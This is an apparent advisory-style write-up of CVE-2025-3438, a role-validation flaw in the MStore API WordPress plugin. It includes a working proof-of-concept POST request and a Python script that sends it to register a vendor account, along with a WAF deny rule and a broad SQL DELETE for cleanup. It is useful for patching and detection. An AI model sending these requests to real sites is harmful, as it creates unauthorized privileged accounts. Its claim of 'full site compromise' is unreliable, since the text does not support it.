How CVE-2025-3438 Works
The MStore API plugin for WordPress (up to v4.17.4) fails to enforce role restrictions during user registration. Unauthenticated attackers can exploit this flaw to register as a wcfm_vendor—a Store Vendor role in the WCFM Marketplace plugin. This escalation is only possible if WCFM Marketplace is active. The vulnerability stems from improper role validation during registration, allowing attackers to bypass intended permissions. A partial patch was released in v4.17.3 but did not fully mitigate the issue.
DailyCVE Form
Platform: WordPress
Version: ≤4.17.4
Vulnerability: Privilege Escalation
Severity: Critical
Date: 05/06/2025
What Undercode Say:
Exploit Analysis:
1. Exploit Path:
- Send crafted POST request to
/wp-json/mstore/v1/register. - Specify `wcfm_vendor` role in payload.
2. Proof-of-Concept (PoC) Request:
POST /wp-json/mstore/v1/register HTTP/1.1
Host: vulnerable.site
Content-Type: application/json
{
"username": "attacker",
"email": "[email protected]",
"role": "wcfm_vendor"
}
Mitigation Commands:
1. Immediate Patch:
wp plugin update mstore-api --version=4.17.5
2. Temporary Workaround:
wp plugin deactivate wcfm-marketplace
Detection Script (Python):
import requests
def check_vulnerability(url):
payload = {
"username": "test",
"email": "[email protected]",
"role": "wcfm_vendor"
}
response = requests.post(f"{url}/wp-json/mstore/v1/register", json=payload)
return "role" in response.text and "wcfm_vendor" in response.text
if check_vulnerability("http://target.site"):
print("[!] Vulnerable to CVE-2025-3438")
Protection Steps:
1. WAF Rule (ModSecurity):
SecRule ARGS:role "@streq wcfm_vendor" "id:1005,deny,msg:'CVE-2025-3438 Exploit Attempt'"
2. Database Cleanup:
DELETE FROM wp_usermeta WHERE meta_key='wp_capabilities' AND meta_value LIKE '%wcfm_vendor%';
Impact: Full site compromise via vendor-level access.
Patch Reference: Update to MStore API ≥4.17.5.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
